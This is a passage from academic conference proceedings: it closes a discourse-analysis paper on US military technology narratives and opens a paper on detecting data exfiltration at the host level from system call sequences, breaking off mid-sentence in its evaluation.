important, winning the battle of narratives is "absolutely crucial". The report makes the conclusion that<br />
Dominating the narrative of any operation, whether military or otherwise, pays enormous<br />
dividends. [...] In the battle of narratives, the United States must not ignore its ability to<br />
bring its considerable soft power to bear in order to reinforce the positive aspects of Joint<br />
Force operations. Humanitarian assistance, reconstruction, securing the safety of local<br />
128
Saara Jantunen and Aki-Mauri Huhtinen<br />
populations, military-to-military exercises, health care, and disaster relief are just a few<br />
examples of the positive measures that we offer.<br />
This statement is interesting, as we have witnessed the emergence of operations 'other than war'. In<br />
the narrative of Operation Iraqi Freedom, the military leadership put much focus on the humanitarian<br />
aspect of the operation. But, the "battle of narratives" manifested itself not only in word choices such<br />
as liberate and humanitarian aid, but also as words such as precision-guided weapons. The emphasis<br />
of the use of precision guided munitions can be seen as semantic tactics. Technology is part of the<br />
narrative.<br />
JOE10 mentions the words deter and deterrence several times, and finally concludes that deterrence<br />
will be the "primary purpose" of the military forces. This explains the threat discourse: the only way to<br />
deter is to excel over the rest in skill, capacity and resources. Deterrence will be created by absorbing<br />
education and science: "The Services should draw from a breadth and depth of education in a range<br />
of relevant disciplines to include history, anthropology, economics, geopolitics, cultural studies, the<br />
‘hard’ sciences, law, and strategic communication", the report states. It also stresses that in future,<br />
asymmetric and irregular warfare will be more likely than conventional warfare, and that the U.S.<br />
military should be prepared for this:<br />
Irregular wars are more likely, and winning such conflicts will prove just as important to<br />
the protection of America’s vital interests and the maintenance of global stability.<br />
To summarize the report, we make the following conclusions: In strategy, techno-speak<br />
1. is part of the "battle of narratives"<br />
2. is based on threat discourse<br />
3. serves the function of deterrence<br />
The analysis uses these conclusions as the starting point for the linguistic part of the analysis.<br />
5.1 Narrating the doctrine: Effects Based Operations briefing<br />
This briefing aired on the same day when the coalition forces started the Operation Iraqi Freedom by<br />
bombing Baghdad. In this briefing, Colonel Gary Crowder (the division chief at Air Combat Command<br />
and the plans director for Strategy, Concepts and Doctrine) introduces the concept of Effects Based<br />
Operations (EBO) to the public. The role and type of technology descriptions in it will be discussed in<br />
this section.<br />
Two types of clauses are included in the analysis: those, where the 'doer' is technology, and those<br />
where the 'doer' is 'us' (the US, Coalition Forces, etc).<br />
When looking at the clauses where technology is the Actor, the main observations are that in these<br />
descriptions the typical process is a description of 'enabling', and the object of action (Goal or Range,<br />
often in a projected clause) is abstract or ambiguous:<br />
Table 1: Technology as a doer<br />
ACTOR PROCESS<br />
(material)<br />
BENEFICIARY<br />
1 these analytical tools enable us [...] to find alternative methodologies<br />
2 [PGM] [...] give us the ability for a large number of other<br />
aircraft besides just stealth aircraft to hit<br />
multiple weapons per targets.<br />
3 its stealth qualities enable us to do a large number of things<br />
4 [the stealth] enables us to do a lot more stuff<br />
5 the stealth does give us some capabilities in addition to the<br />
precision<br />
In action descriptions where the Actor is human or animate, there are two main types. The first type<br />
are the descriptions of dynamic military action and capability:<br />
129
Table 2: Human as a DOER<br />
ACTOR/<br />
CARRIER<br />
Saara Jantunen and Aki-Mauri Huhtinen<br />
PROCESS<br />
(material or relational)<br />
GOAL/RANGE/POSSESSED<br />
6 we were able to take down the air defense system<br />
7 we were able to neutralize those towers<br />
8 we can hit multiple targets<br />
9 we have much more dual-use capability in each of the Air Force's,<br />
Navy's and Marines' fighter<br />
aircraft as well as our<br />
bomber aircraft<br />
10 we have an improved ability to go after adversary's<br />
systems<br />
The action descriptions refer to the use of weapons and technology. In descriptions of military action,<br />
the process is typically material (physical) and the object of the action is inanimate and often abstract.<br />
The data also contains a number of possessive attributive action descriptions (having something),<br />
where the entity possessed is typically capability or ability, both abstract. The evaluation of the first<br />
ten sample clauses is positive. The Process (often combined with the Goal/Range) signal social<br />
esteem in the form of capacity; Technology and Self are described as competent, expert and<br />
powerful. The objects of action are inanimate, which signals Social Sanction: the one acting is good,<br />
moral and ethical by attacking non-human targets.<br />
The second type consists of action descriptions that are somewhere between material and mental<br />
processes:<br />
Table 3: Human as a doer<br />
# SENSER PROCESS (mental) PHENOMENON<br />
11 I would prioritize [...] those targets<br />
12 we look at the desired effects we want to create on the battlespace,<br />
13 we evaluate the target sets that we need to do, that -- those effects that we<br />
need to create on the battlespace<br />
14 we bring those together into a integrated plan<br />
15 we literally come up with a high heaven objective<br />
These descriptions highlight the analytical part of waging war: the planning and the creating of<br />
strategy. In this context we will analyze them as mental processes, because they are strongly<br />
contrastive to the material processes of attacking and neutralizing, and their purpose is to emphasize<br />
the role of the scientific and creative planning process in warfare. The evaluation in the above clauses<br />
is, just like in the first ten, positive. Capacity is signaled with descriptions of observation, consideration<br />
and learnedness. These Process types can further be characterized as perceptive and cognitive<br />
(Halliday, 2004: 210).<br />
To put it briefly, the source text emphasizes Capacity that is realized by descriptions of having both<br />
inner (ability, cognitive skills) and outer (material, technological) resources. Of all action, the emphasis<br />
is on inner experience: Weapons are of course used, but after a planning process that is described as<br />
highly scientific. In addition to action descriptions, the briefing contained a number of nominal<br />
constructions that are worth notice:<br />
Table 4: Nominalizations<br />
Nominal constructions: technology<br />
the combination of a fortuitous development of different capabilities and technologies<br />
the development of the laser-guided bombs<br />
the capability of a Joint Direct Attack Munition<br />
the evolution of about the last 20 years<br />
the evolution of both the Air Force and the Navy and Marine Corps' combat<br />
our ability to go after targets<br />
130
Saara Jantunen and Aki-Mauri Huhtinen<br />
The above nominalizations capture the semantic content of the action descriptions: development,<br />
capability, evolution, ability. The order of these nominalizations create a narrative of evolving and<br />
developing capability that finally is utilized as an ability. This narrative creates a concept of<br />
advancement and technological omnipotence.<br />
5.2 Discussion<br />
There are two major players in the Grand Narrative of War: Technology is the enabler, and 'we' are<br />
the able. The ability technology creates is to wage war effectively, precisely and securely and so save<br />
lives by avoiding casualties and collateral damage. Technology is the prerequisite for humanity in<br />
warfare. In this narrative, war has evolved into "Effects Based Operations" on one hand, and into<br />
humanitarian operations on the other. The result is war's new image, which is slowly drifting further<br />
and further away from the killing, and closer and closer to implementing humanity. This is the source<br />
of the binary rhetoric of 'bombing for peace' and 'destroying the village to save it'.<br />
The frequently occurring words capacity and capability are abstract subordinate terms that may mean<br />
anything from having financial or human resources to operate to meaning the quality of weapons<br />
systems, planning, or the mass of the actual weapons. These are everyday terms in strategy and<br />
operations discussed in public and allow the speaker to carry out the tactic of neutrality through<br />
vagueness.<br />
The technology descriptions in American war-speak execute the function of deterrence. As Joint<br />
Operational Environment 2010 (United States Joint Forces Command, 2010) concludes, the task of<br />
deterrence will be increasingly important. This, although, evokes the question whether the asymmetric<br />
and irregular enemy the report described can be deterred and if so, whether technology as a<br />
deterrence will work. Insurgents use inexpensive and asymmetric forms of combat, to which the U.S.<br />
responds with expensive counter measures. According to 2008 National Defense Strategy,<br />
deterrence must include both military and non-military tools, and that "changes in capabilities,<br />
especially new technologies" help to create a credible deterrence. Metz (2007: 65) elaborates on the<br />
logic of fighting insurgency with technology:<br />
Counterinsurgency experts long have argued that technology is unimportant in this type<br />
of conflict. While it is certainly correct that technology designed to find and destroy a<br />
conventional enemy military force had limited application, other types such as nonlethal<br />
weapons and robotics do hold promise for difficult tasks such as securing populated<br />
areas, preventing infiltration, and avoiding civilian casualties.<br />
While the counterinsurgency (COIN) strategy emphasizes the integration of military and non-military<br />
means, the military still turns to technology for answers. EBO, once justified with the promise of new<br />
technologies, has been abandoned and replaced with a 'Comprehensive Approach'. These new<br />
strategies (and if not old, then updated) are justified with 'even less' collateral damage and 'even<br />
better' precision - enabled by technology. The name of the applied strategies change, but the<br />
discourse (and the weapons used) remains the same. The deterrence the West imposes means<br />
smaller and smaller missiles (yet more lethal than ever), satellites and stealth drones (that both<br />
observe us and guide missiles) and cyberspace. Virilio (2009) calls this "aesthetics of disappearance".<br />
The collective Western outlook no longer tolerates alternatives that would make war visible. At the<br />
same time, we fear the unseen.<br />
The Joint Operating Environment 2010 (ibid.) also remarks that individual soldiers are increasingly<br />
"global communication producers". According to the report, in the "battle of narratives" the role of the<br />
"strategic corporal whose acts might have strategic consequences if widely reported" is big. By pressbriefing<br />
the media and embedding journalists in 'liberation operations', the military leadership is<br />
creating strategic communication that is convincing enough to appeal not only to the public, but also<br />
to the soldier that has to be supervised and controlled by the system and as part of the system - not<br />
as an individual. In the words of the COIN Field Manual: "Information operations (IO) must be<br />
aggressively employed" to "obtain local, regional, and international support for COIN operations" and<br />
"discredit insurgent propaganda and provide a more compelling alternative to the insurgent ideology<br />
and narrative".<br />
131
6. Conclusion<br />
Saara Jantunen and Aki-Mauri Huhtinen<br />
The Revolution in Military Affairs presents the new identity of war as a system of technologies, an<br />
ideology which manifests itself in military discourse. In addition, system thinking, such as EBO, has<br />
created the demand for both internal and external control in the Western military force. This<br />
combination of strategically significant military contractors, techno-faith and the need to dominate and<br />
control have led to strategic communication, which contains the Grand Military Narrative. According to<br />
this Grand Narrative, technology executes, with precision, reliability and from a distance, the duties<br />
determined by analytical, rational and morally virtuous humans. The public role of the military is to 'do<br />
good'. In this narrative, war is removed from the battle fields into the virtual.<br />
The binary roles of the military result in binary rhetoric, and this is very visible in the analysis<br />
introduced in this article. Whereas the adversary, the insurgents, conduct hands-on warfare based on<br />
the assumption that the insurgent will die in the process, the West distances itself from the discomfort<br />
both physically (drones and missiles) and mentally (distance and simulation) and tolerate no losses.<br />
'We' cling onto everything we have, whereas 'they' have little to lose. 'We' fight the enemy with the<br />
exact opposite way than they fight 'us': The US is portrayed as evolved and scientific, while the<br />
majority of the militaries in the rest of the world employ very different methods of warfare. This makes<br />
the discourse on the threats of asymmetric enemies interesting. Is it not the RMA that distanced 'us'<br />
from the enemy and created asymmetry, the Frankenstein we are now terrified of?<br />
The Grand Military Narrative is full of paradoxes. Rhetoric, strategy and reality do not meet. The result<br />
is that we are deterring an asymmetric enemy (that cannot be deterred) with weapons (that cannot be<br />
seen) and pay more than we can afford to in order to do so (while the enemy pays close to nothing).<br />
The paradox here is that in an arms race against asymmetric enemies, the winner is not the one who<br />
has the highest technology, but the one who tolerates the biggest losses.<br />
References<br />
Allen, Patrick D. (2010) Information Operations Planing, Boston: Artech House.<br />
Boisot, M. H., MacMillian, I. C. and Han, K. (2007) Explorations in Information Space. Knowledge, Agents, and<br />
Organisation, London: Oxford University Press.<br />
Campen, A. (1996) Cyberwar, Washington D.C.: AFCEA Press.<br />
Campen, A. (1992) The First Information Warfare: The Story of Computers and Intelligence Systems in the<br />
Persian Gulf War, Washington D.C.: AFCEA International Press.<br />
Czosseck, C. and Geers, K. (Eds.) (2009) The Virtual Battlefield: Perspectives on Cyber Warfare, Amsterdam:<br />
IOS Press.<br />
David, G. J. and McKeldin III, T.R. (Eds.) (2009) Ideas as Weapons. Influence Perception in Modern Warfare,<br />
Washington D.C.: Potomac Books.<br />
Der Derian, J. (2009) Virtuous War, New York: Routledge.<br />
Fainaru, S. and Klein, A. (2007) 'In Iraq, a Private Realm Of Intelligence-Gathering', Washington Post, 1 July,<br />
[Online], Available: http://www.washingtonpost.com [19 Oct 2010].<br />
Halliday, M.A.C. (2004) An Introduction to Functional Grammar. Revised by Matthiessen, C.M.I.M, London:<br />
Arnold.<br />
Johnston, W. (2010) 'War Games Lure Recruits For 'Real Thing'', NPR, 31 July, [Online],<br />
Available:http://www.npr.org/templates/story/story.php?storyId=128875936 [19 Oct 2010].<br />
Krishnan, A. (2009) Killer Robots. Legality and Ethicality of Autonomous Weapons, Burlington: Ashgate.<br />
Libicki, M. (1996) What is Information Warfare? Washington DC: National Defence University Press.<br />
Matthews, W. (2010) 'Smaller, Lighter, Cheaper: New Missiles Are 'Absolutely Ideal' for Irregular Warfare',<br />
Defense News, 31 May, [Online], Available: http://www.defensenews.com/story.php?i=4649372 [19 Oct<br />
2010]<br />
Metz, S. (2007) Learning from Iraq: Counterinsurgency in American strategy, [Online], Available:<br />
http://www.strategicstudiesinstitute.army.mil/pubs/download.cfm?q=752 [19 Oct 2010].<br />
Rantapelkonen, J. (2006) The Narrative Leadership of War: Presidential Phrases in the 'War on Terror' and their<br />
Relation to Information Technology. Doctoral Dissertation. Publication Series 1, Research n:o 34, Helsinki:<br />
National Defence University.<br />
Risen, J. & Mazzetti, M. (2009) 'C.I.A. Said to Use Outsiders to Put Bombs on Drones', New York Times, 20 Aug,<br />
[Online], Available: http://www.nytimes.com/2009/08/21/us/21intel.html [19 Oct 2010].<br />
Stahl, R. (2010) Militainment, INC. War, Media, and Popular Culture, New York: Routledge.<br />
Shimko, K. L. (2010) The Iraq Wars and America’s Military Revolution, New York: Cambridge University Press.<br />
Soeters, J., van Fenema P.C., & Beeres, R. (Eds.) (2010) Managing Military Organizations: Theory and practice,<br />
London: Routledge.<br />
Taylor, P. (2003) Munitions of the Mind: A History of Propaganda from the Ancient World to the Present Day, 3rd<br />
edition, Manchester: Manchester University Press.<br />
132
Saara Jantunen and Aki-Mauri Huhtinen<br />
Thearmyexperience (2008) Inside the Army Experience Center, [video online]<br />
Available:http://www.youtube.com/watch?v=-lZKV9bP_0Q [19 Oct 2010]<br />
Toffler, A. (1981) The Third Wave, New York: Bantam Books.<br />
Toffler, A . & Toffler, H. (1993) War and Anti-War: Survival at the Dawn of the 21st Century, Boston: Little, Brown<br />
& Co.<br />
United States Joint Forces Command. (2010) The Joint Operating Environment 2010 [Online], Available:<br />
http://www.jfcom.mil/newslink/storyarchive/2010/JOE_2010_o.pdf [19 Oct 2010].<br />
U.S. Department of Defense (2008) 2008 National Defense Strategy, [Online], Available:<br />
http://www.defense.gov/news/2008%20national%20defense%20strategy.pdf [19 Oct 2010]<br />
U.S. Department of Defense (2003) Effects Based Operations Briefing. Transcript, 19 March, [Online], Available:<br />
http://www.defense.gov/Transcripts/Transcript.aspxTranscriptID=2067 [19 Oct 2010]<br />
Wichner, D. (2010) 'Raytheon's new Griffin fit for drone', Arizona Daily star, 22 Aug, [Online] Available:<br />
http://azstarnet.com/business/local/article_ff437ef6-c69d-56c6-aeff-e74d0d5902b9.html [19 Oct 2010]<br />
Ventre, D. (2007) Information Warfare, London: Wiley.<br />
Virilio, P. (2009) The Aesthetics of Disappearance, Translated by Philip Beitchman, Los Angeles: Semiotext(e).<br />
Virilio, P. (1989) War and Cinema. The Logistics of Perception, Translated by Patrick Camiller, London: Verso.<br />
Wiest, A. (2006). Rolling Thunder in a Gentle Land – The Vietman War Revisited, London: Osprey Publishing.<br />
Zizek, S. (2009). Pehmeä vallankumous. Translated by Janne Porttikivi, Helsinki: Gaudeamus.<br />
Unpublished<br />
XX. (2010) “On Making War Possible: Strategic Thinking, Soldiers’ Identity, and Military Grand Narrative”.<br />
(Unpublished manuscript in Security Dialogue)<br />
133
Host-Based Data Exfiltration Detection via System Call<br />
Sequences<br />
Brian Jewell 1 and Justin Beaver 2<br />
1<br />
Tennessee Technological University, Cookeville, USA<br />
2<br />
Oak Ridge National Laboratory, Oak Ridge, USA<br />
bcjewell21@tntech.edu<br />
beaverjm@ornl.gov<br />
Abstract: The host-based detection of malicious data exfiltration activities is currently a sparse area of research<br />
and mostly limited to methods that analyze network traffic or signature based detection methods that target<br />
specific processes. In this paper we explore an alternative method to host-based detection that exploits<br />
sequences of system calls and new collection methods that allow us to catch these activities in real time. We<br />
show that system call sequences can be found to reach a steady state across processes and users, and explore<br />
the viability of new methods as heuristics for profiling user behaviors.<br />
Keywords: data exfiltration, data security, intrusion detection<br />
1. Introduction<br />
A successful attack on an organization involving the theft of sensitive data can be devastating. Data<br />
exfiltration is the term used to describe this type of theft and can be defined as the unauthorized<br />
transfer of information from a computer system. Data exfiltration attacks represent a tremendous<br />
threat to both government entities and commercial enterprises.<br />
Government organizations maintain repositories for sensitive and classified information, and breaches<br />
into protected systems or leaks into the public domain can have implications that threaten national<br />
security. Commercial enterprises manage complex levels of proprietary tools and data that, if<br />
compromised, could endanger the financial security of their institutions and/or their customers. Recent<br />
studies find that information leaks are the most prevalent security threat for organizations 0 and that in<br />
recent years attackers have exfiltrated more than 20 terabytes of data, much of which is sensitive,<br />
from the U.S. Department of Defense and Defense Industrial Base organizations, as well as civilian<br />
government organizations 0.<br />
Despite the threat, the approach to defending against these attacks is surprisingly unsophisticated.<br />
Off-the-shelf intrusion detection systems (IDS) monitor for known malicious network signatures at the<br />
system boundary. These systems are relied upon to flag potential network breaches, which are then<br />
typically investigated manually (often these are guided analyses that leverage custom-built scripts) in<br />
order to trace potential unauthorized activities. Unfortunately, the model of perimeter defense leaves<br />
attackers free to navigate, investigate, and extrude information if the perimeter is breached<br />
undetected.<br />
Host intrusion detection systems (HIDS) are software programs that run on each computer host in a<br />
network and attempt to detect malicious events in the operation of the host. Commercial virus<br />
protection packages (McAfee, 2003) are examples of HIDS and monitor system services, registry<br />
changes, and check individual files for signatures of known malicious programs. We approach the<br />
detection of data exfiltration attacks as a HIDS. Once the boundary defense is breached, it is from the<br />
individual hosts that a malicious user will explore file systems, package data, and export it to an<br />
outside network. We postulate that, given insight into the activities of individual users and processes<br />
on a given host, acts of unauthorized data exfiltration can be discriminated from normal user/process<br />
behaviors.<br />
Our hypothesis hinges on the availability of low-level data that reflects the operation of processes on<br />
a computer host. We propose to achieve this insight into the computer’s operation through the<br />
monitoring of system calls, which are low-level process interactions with the host computer’s<br />
operating system. System calls provide a window into what all processes and users on a host<br />
machine are executing, regardless of how they are interacting with the machine. In addition, they<br />
provide more fidelity in identifying individual actions than a process monitor.<br />
134
Brian Jewell and Justin Beaver<br />
In this paper, we propose the use of a method by which unique sequences of system calls, managed<br />
at the process/user level, are the basis for discriminating normal and anomalous behaviors by users<br />
for use as an exfiltration detection agent. We then evaluate this model to fit our 3 criteria for a viable<br />
detection agent.<br />
Tractable- The chosen method must be able to run in real time while having negligible effect on a<br />
system as experienced by the end user.<br />
Environmentally Neutral- Our method must also be portable and adapt to any environment.<br />
Responsive- Lastly, our ideal method should reliably report on data exfiltration behaviors.<br />
The following sections are organized as follows: Section 2 provides a review of similar work. Section 3<br />
formalizes the methodology we used to categorize normal behavior and collect a profile from the<br />
system call data traces. Section 4 evaluates our method according to the 3 criteria we set, and<br />
Section 5 gives a detailed account of our results, conclusions, and ideas for future work.<br />
2. Related work<br />
The detection of data exfiltrations has been a recent focus of cyber security research. Exfiltration<br />
detection is a difficult problem due to the wide range of methods available, and the subtlety with which<br />
it can be performed 0. Current IDS systems are mostly concerned with intrusion attempts, although<br />
there are extrusion detection systems that are commercially available (e.g., 0. Like network-based<br />
IDSs, these are primarily signature-based solutions that perform network traffic analysis through<br />
custom hardware.<br />
Many more advanced data analysis approaches have been proposed, including clustering of network<br />
traffic for anomaly detection 0, the application of statistical and signal processing methods to<br />
outbound traffic for signature identification 0, and the application of data mining techniques 0 to<br />
network data. These approaches yielded varying degrees of success, but inevitably were plagued<br />
with base-rate fallacy 0 issues or a narrow problem focus.<br />
However, when we look at previous work on host-based IDSs there is some inspiration for host-based<br />
data exfiltration detection. In 1996, Forrest, et al, proposed a host-based intrusion detection method<br />
based on the monitoring of system calls (Forrest, 1996). This early work was inspired by the human<br />
immune system's ability to recognize what cells are part of the host organism (it's self) or foreign (nonself).<br />
They used this principle in developing their own methodology for constructing a "sense of self"<br />
for Unix based systems using available system trace data.<br />
Forrest’s methodology used lookahead pairs, or sets containing pairs of system calls formed by the<br />
originating system call and the one that follows it with spacing 1, 2, 3, .. k. These pairs were used to<br />
form a database of normal process behavior (or self), and used to monitor for previously unfound<br />
patterns, that were then tagged as anomalous (or non-self). While their results were only preliminary,<br />
they did show that a stable signature of normal process behavior could be constructed using very<br />
simple methods.<br />
Many other approaches have been taken since to model the behavior of processes using system<br />
calls, including the use of Hidden Markov Models (HMM) (Gao, 2006), neural networks (Endler, 1998),<br />
k-nearest neighbors (Liao, 2002), and Bayes models (Kosoresow, 1997). These models were all<br />
developed in hopes of producing more accurate models while reducing false positives which comes at<br />
a high computational cost. The most notable advantage of Forrest's model is the ability to track<br />
processes for anomalous behavior at the application layer of each individual host in real time at a very<br />
low computational cost.<br />
Forrest et al., later improves upon their work in (Forrest, 2008) by introducing another simple model<br />
that is suitable for real-time detection dubbed sequence time-delay embedding (stide), and again<br />
involves the enumeration of system call sequences. However, this time their method uses contiguous<br />
sequences of fixed length to form a database of normal behavior. They also introduce a new<br />
modification to their method called sequence time-delay embedding with frequency threshold (t-stide).<br />
This method explores the hypothesis that sequences with very low occurrence rates in training data<br />
are suspicious.<br />
135
Brian Jewell and Justin Beaver<br />
Forrest et al. tested these methods against 2 popular machine learning methods. One based on<br />
RIPPER - a rule learning system developed by William Cohen (Cohen, 1995) that was later adapted<br />
by Lee et al. (Lee 1998, 1999) to learn rules to predict system calls and find anomalies, and the other<br />
based on HMMs as used in (Gao, 2006). While they weren't able to show that stide performed better<br />
than the other methods, they did conclude that it performed comparably to more complicated<br />
methods.<br />
Our work is most closely paralleled by that of Forrest and leverages host-based system call<br />
information to detect anomalous user behaviors. Unlike previous work, we seek to implement and<br />
adapt this approach as an analysis process that is user and process centric to detect data exfiltration<br />
agents.<br />
3. Methodology<br />
Our model for data exfiltration detection focuses on the analysis of system calls used in a host’s<br />
operation and hinges on observations similar to that found in previous works by Forrest et al. (Forrest,<br />
2008). This section justifies the use of sequences of system calls as a mechanism for defining normal<br />
behaviors in Section 3.1, discusses variants in optimizing system call sequences in Section 3.2, and<br />
compares these variants for use as data exfiltration detectors in Section 3.3.<br />
3.1 Defining normal in sequences of system calls<br />
A system call trace or system call sequence is the ordered list of system calls as invoked by a process<br />
that spans the length of execution by a given user. An example system call trace for a given user<br />
might be:<br />
“..., open, read, fstat, fstat, write, close, mmap,...”,<br />
where “open”, “read”, “fstat” , etc. are all examples of system call executable names. All invoked user<br />
operations, whether a command line imperative or in the operation of a running program, use various<br />
combinations of system calls to complete their tasking. Even simple commands, such as a directory<br />
listing, use a sequence of multiple system calls to execute.<br />
While there are a number of current methods to enumerate system call sequences, there is a<br />
common theme: to form a data store of traces that are used to characterize normal behaviors (also<br />
referred to as a normal profile) in a given environment. Once the data store is established, it can be<br />
used as the basis for identifying future sequences as normal (within the set) or anomalous (not<br />
included in the set). In addition, it is desirable for any automated comparison of this profile with<br />
experienced events to be computationally tractable.<br />
Previous research (Forrest, 2008) on host-based IDSs that has attempted to use system call<br />
sequences to detect anomalous behaviors has concentrated on detecting anomalies in program<br />
execution. That is, the focus of the analysis is on individual processes and their execution but did not<br />
take into account the uniqueness of each individual user.<br />
By contrast, when attempting to detect data exfiltrations, we are more interested in the behavior<br />
specific to a user. However, in order to create a normal profile that is specific to a user, it must be<br />
established that system call sequences are suitable for discriminating normal and anomalous<br />
behaviors in such a context.<br />
Given that, experientially, user behavior seems to vary drastically depending on the task being<br />
performed at any given moment, it is necessary to support the claim that unique system call<br />
sequences for a user can be generalized.<br />
We performed an experiment in which the unique system call sequences for individual users were<br />
tracked. The results of this experiment are illustrated in Figure 1. We define a stable profile as one<br />
that plateaus at a given size (N sequences). It's the asymptotic nature of the line that makes the<br />
anomalous detection possible.<br />
That is, in a given trace, the number of sequences generated can always be observed to "step" or to<br />
plateau under normal usage and to increase suddenly when a user performs a new or unusual action.<br />
136
Brian Jewell and Justin Beaver<br />
Figure 1 demonstrates that, despite varying operations by users, a normal profile can be established<br />
and characterized by a tractable (< 200) number of unique system call sequences.<br />
Figure 1: Number of unique system call sequences for a given user/process versus the total number<br />
of system calls<br />
3.2 Models for system call sequences<br />
For our testing we implemented three different simple methods for enumerating system calls. The first<br />
of these methods is implemented very similarly to stide (Warrender, 1999). The method uses a sliding<br />
window of size N across all system calls included in a trace to form the sequences. However, we have<br />
adapted the method to incorporate UID/process name pairs to create a profile of our trace data.<br />
We also wanted to take care in choosing an appropriate value of N to be used with our<br />
implementation. The best value for N that is used for stide and similar implementations is discussed in<br />
a number of previous works. Kosoresow et al. (Kosoresow, 1997) suggest “the best sequence length<br />
to use would be 6 or slightly higher than 6.” And Kymie 0 in a paper dedicated to the singular question<br />
of “Why 6?” provide evidence supporting the conjecture empirically.<br />
However, while evaluating our own variable sequence length method we identify another possible and<br />
more fundamental reason to pick a sequence size of 6. In Figure 2 we see the number of unique<br />
sequences present in a complete “normal” profile generated by our variable length sequence collector<br />
over one week.<br />
It is interesting to note the dramatic decrease in the number of sequences that occur with a length<br />
greater than 6. As the value of N increases we increase the accuracy of the profile generated<br />
proportionately to the percentage of system call sequences that fall under that size. However, we also<br />
increase our learning time and profile complexity by the same proportions. Therefore, for our<br />
experiments we also use 6 for the length of our sequences<br />
The next model is designed to avoid the apparent shortcomings of the windowing method. Many<br />
sequences of length 1 or 2 can be observed as repeating continuously, making a perfect fit with the<br />
windowing method requires substantial unnecessary overhead. This is also demonstrated in Figure 2.<br />
This leads us to theorize that a method utilizing a variable window length would perform better than<br />
the previous methods.<br />
While developing an approach to create variable sequences of system calls it was important to<br />
preserve the low run time complexity of the sliding window method while attempting to better model<br />
normal behavior. Thus, a simple solution was chosen. In order to construct our variable sequences we<br />
chose a subset such that sequence length is maximized while no one system call is repeated. This is<br />
implemented by constructing a sequence as calls are being traced and beginning a new sequence<br />
when a call is found to be a repeat in the current sequence.<br />
137
Brian Jewell and Justin Beaver<br />
Figure 2: Number of unique sequences observed with the size N (x-axis)<br />
Up to this point we ignore the additional information about each system call in building our normal<br />
profile. Thus, we implement a third method that additionally uses errno, and function arguments in<br />
matching sequences.<br />
The method uses the same methodology as the variable length sequences. Unique system call<br />
sequences are selected in such a way that length is maximized while no one system call is repeated<br />
in a given sequence. However, here we define a system call as {probefunc, errno, args}.<br />
3.3 Comparison and discussion<br />
To validate our methods we tested them against each other. In Figure 3 we show the increase in<br />
number of sequences generated over one week of collection for a given UID/execname pair. From<br />
Figure 3 we can observe that the variable sequence length method both finishes training of a normal<br />
sequence faster and uses less sequences than both of the other methods as hoped. This is likely in<br />
part due to the observation that the majority of sequences have a length less than 6 and the smaller<br />
the sequence the more that they repeat. (Refer back to Figure 2)<br />
Other observations we can make from Figure 3 is that the variable with arguments method reaches a<br />
stable state faster than the windowing method and without an unacceptable large increase in the<br />
number of unique sequences. Again, this is most likely due to the better fitting of high frequency<br />
sequences.<br />
The surprise comes in how poorly the windowing method performs in terms of generating a stable<br />
profile. Overall the windowing method performs well, but when the testing is stretched over the period<br />
of a week the method fails to show the same level of stabilization as the other 2 methods. Thus, for all<br />
purposes the variable method seems superior, with the addition of arguments requiring a much large<br />
database which correlates to a lot more false positives. Since detection speed and precision are what<br />
we’re interested in, we’ll be using the variable method for the remainder of our testing.<br />
Figure 3: Three sequence collection methods (SEQ - windowing, VAR - variable, VARARG - variable<br />
with arguments) compared by number of unique sequences generated<br />
138
4. Evaluation<br />
Brian Jewell and Justin Beaver<br />
We now evaluate the method prescribed in the previous section against our three criteria for our ideal<br />
exfiltration detection agent.<br />
4.1 Tractable<br />
Perhaps the largest singular challenge encountered during the implementation of this project is the<br />
task of collecting and managing the torrent of system calls that occur during normal to heavy use of a<br />
modern computer. Each user or process action can result in hundreds of system calls and in our own<br />
experiments logging system call activity alone generates a gigabyte of data per hour. In previous work<br />
(Kang, 2005; Forrest, 2008) this problem is sidestepped mainly by concentrating on individual<br />
processes/users/calls and/or using previously collected data.<br />
Unlike prior efforts, we are interested in tracing all system calls across multiple users to track their<br />
behavior in real time, and we also desire to deploy a swift analysis of that data without noticeably<br />
degrading system performance or destabilizing the system. While researching options for this we<br />
found an existing commercial solution that meets all of our needs.<br />
Dtrace (Dtrace, 2009) is a software tool that is designed specifically for low impact system call tracing<br />
for system administration and debugging. More importantly, it can be configured to collect the<br />
required system call data with negligible effect on system performance, such as timestamp, user and<br />
process identifiers, executable names, error numbers, and executable arguments.<br />
Another challenge is the management of the collected data. Retaining and cataloging all the system<br />
calls for analysis at a later time is impractical given the observed data rate of over 1 gigabyte per<br />
hour. As we previously discussed, by collecting just the unique sequences that form our profile of<br />
normal behavior in real time we elegantly address this problem.<br />
Figure 1 shows the increase in number of unique system calls for the 1/java pair in an hour long<br />
system call set using our variable sequence model. This pair was chosen because of the volume of<br />
system calls that are produced while the program was actually conducting only a few functions<br />
repeatedly. Over the course of approximately 1.4 million system calls generated by 1/java contained<br />
the trace, only 196 unique sequences were recorded. It's this quick stabilization and small normal<br />
profile that combine with the advantages of Dtrace to make our implementation light-weight with very<br />
low observable impact on system performance.<br />
4.2 Environmentally neutral<br />
In order to validate that we can distinguish a normal profile of one user/process apart from another<br />
regardless of environmental conditions such as the operating system or other operational conditions,<br />
we must first explore the “diversity hypothesis” similar to that put forth by Forrest et al. in (Forrest<br />
2008). Their hypothesis states that the code paths executed by a process are highly reliant upon the<br />
usage patterns of the users, configuration, and environment hence causing what is considered to be<br />
normal to differ widely from one installation to the next.<br />
While the methods used to create the sequences that Forrest et al. are similar they focus solely on<br />
program execution, the same diversity should theoretically still exist between the profiles generated by<br />
our methods when per user patterns are added as a controlling factor. In addition it may also be<br />
possible to determine the degree of impact changes such as different operating systems and varying<br />
users have upon a normal profile. We can observe this in our own testing by comparing the various<br />
collected profiles from different users and operating systems.<br />
Table 1: Comparison of normal profiles generated by different users by platform<br />
User 1B Linux (User1) Solaris (User1)<br />
User 1A 0.91129591 0.16700353 0.19755409<br />
User 1B 1 0.14119998 0.13764726<br />
User 2 0.25793254 0.13287113 0.12885861<br />
User 3 0.30644131 0.17470944 0.20602069<br />
139
Brian Jewell and Justin Beaver<br />
For this testing we had 3 different users (User 1A, User 2, and User 3 in Table 1) run our variable<br />
sequence collection algorithm for approximately 1 hour. All users were using Mac OSX on separate<br />
machines. In addition, we had User 1 repeat the same collection process on a separate date using<br />
Linux and Solaris operating system on different machines trying to keep behavior as similar as<br />
possible.<br />
The most significant result is that profiles from User 1A and User 1B have a >90% match while<br />
profiles generated from the other 2 users did not exceed 31% when compared to User 1. This seems<br />
to confirm that there is significant variation between profiles of one user from another.<br />
Perhaps the disappointment here is that correlation between User 1A and User 1B profiles wasn't<br />
